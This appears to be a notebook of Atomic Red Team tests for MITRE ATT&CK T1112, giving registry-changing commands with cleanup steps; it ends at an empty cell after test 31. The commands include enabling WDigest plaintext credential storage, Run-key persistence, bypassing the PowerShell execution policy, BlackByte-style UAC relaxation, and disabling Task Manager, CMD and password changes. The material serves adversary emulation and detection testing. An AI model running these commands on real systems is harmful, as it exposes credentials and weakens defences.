# T1112 - Modify Registry
Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.

## Atomic Tests

### Atomic Test #1 - Modify Registry of Current User Profile - cmdModify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 1

#### Cleanup: 
```cmd
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Modify Registry of Local Machine - cmdModify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup.  This should only be possible when
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d calc.exe /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 2

#### Cleanup: 
```cmd
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Modify registry to store logon credentialsSets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 3

#### Cleanup: 
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Add domain to Trusted sites ZoneAttackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.

https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
new-itemproperty $key$name -Name http  -Value 2 -Type DWORD;
new-itemproperty $key$name -Name *     -Value 2 -Type DWORD;
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 4

#### Cleanup: 
```powershell
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item  $key -Recurse -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Javascript in registryUpon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "<script>"
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 5

#### Cleanup: 
```powershell
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 5 -Cleanup

### Atomic Test #6 - Change Powershell Execution Policy to BypassAttackers need to change the powershell execution policy in order to run their malicious powershell scripts.
They can either specify it during the execution of the powershell script or change the registry value for it.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 6

#### Cleanup: 
```powershell
try { Set-ExecutionPolicy -ExecutionPolicy Default -Scope LocalMachine -Force } catch {}
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 6 -Cleanup

### Atomic Test #7 - BlackByte Ransomware Registry Changes - CMDThis task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
The steps are as follows:
<ol>
    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
    <li>2. Enable OS to share network connections between different privilege levels</li>
    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
</ol>
The registry keys and their respective values will be created upon successful execution.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 7

#### Cleanup: 
```cmd
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 7 -Cleanup

### Atomic Test #8 - BlackByte Ransomware Registry Changes - PowershellThis task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
The steps are as follows:
<ol>
    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
    <li>2. Enable OS to share network connections between different privilege levels</li>
    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
</ol>
The registry keys and their respective values will be created upon successful execution.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 8

#### Cleanup: 
```powershell
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 8 -Cleanup

### Atomic Test #9 - Disable Windows Registry ToolModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 9

#### Cleanup: 
```cmd
powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 9 -Cleanup

### Atomic Test #10 - Disable Windows CMD applicationModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 10

#### Cleanup: 
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 10 -Cleanup

### Atomic Test #11 - Disable Windows Task Manager applicationModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 11

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 11 -Cleanup

### Atomic Test #12 - Disable Windows Notification CenterModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 12

#### Cleanup: 
```cmd
reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 12 -Cleanup

### Atomic Test #13 - Disable Windows Shutdown ButtonModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 13

#### Cleanup: 
```cmd
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 13 -Cleanup

### Atomic Test #14 - Disable Windows LogOff ButtonModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 14

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 14 -Cleanup

### Atomic Test #15 - Disable Windows Change Password FeatureModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 15

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 15 -Cleanup

### Atomic Test #16 - Disable Windows Lock Workstation FeatureModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 16

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 16 -Cleanup

### Atomic Test #17 - Activate Windows NoDesktop Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 17

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 17 -Cleanup

### Atomic Test #18 - Activate Windows NoRun Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 18

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /f 
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 18 -Cleanup

### Atomic Test #19 - Activate Windows NoFind Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 19

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 19 -Cleanup

### Atomic Test #20 - Activate Windows NoControlPanel Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 20

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 20 -Cleanup

### Atomic Test #21 - Activate Windows NoFileMenu Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 21

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 21 -Cleanup

### Atomic Test #22 - Activate Windows NoClose Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 22

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 22 -Cleanup

### Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 23

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 23 -Cleanup

### Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 24

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 24 -Cleanup

### Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 25

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 25 -Cleanup

### Atomic Test #26 - Hide Windows Clock Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 26

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 26 -Cleanup

### Atomic Test #27 - Windows HideSCAHealth Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 27

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 27 -Cleanup

### Atomic Test #28 - Windows HideSCANetwork Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 28

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 28 -Cleanup

### Atomic Test #29 - Windows HideSCAPower Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. 
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 29

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 29 -Cleanup

### Atomic Test #30 - Windows HideSCAVolume Group Policy FeatureModify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. 
Take note that some Group Policy changes might require a restart to take effect..
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 30

#### Cleanup: 
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 30 -Cleanup

### Atomic Test #31 - Windows Modify Show Compress Color And Info Tip RegistryModify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. 
See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
```

In [ ]:
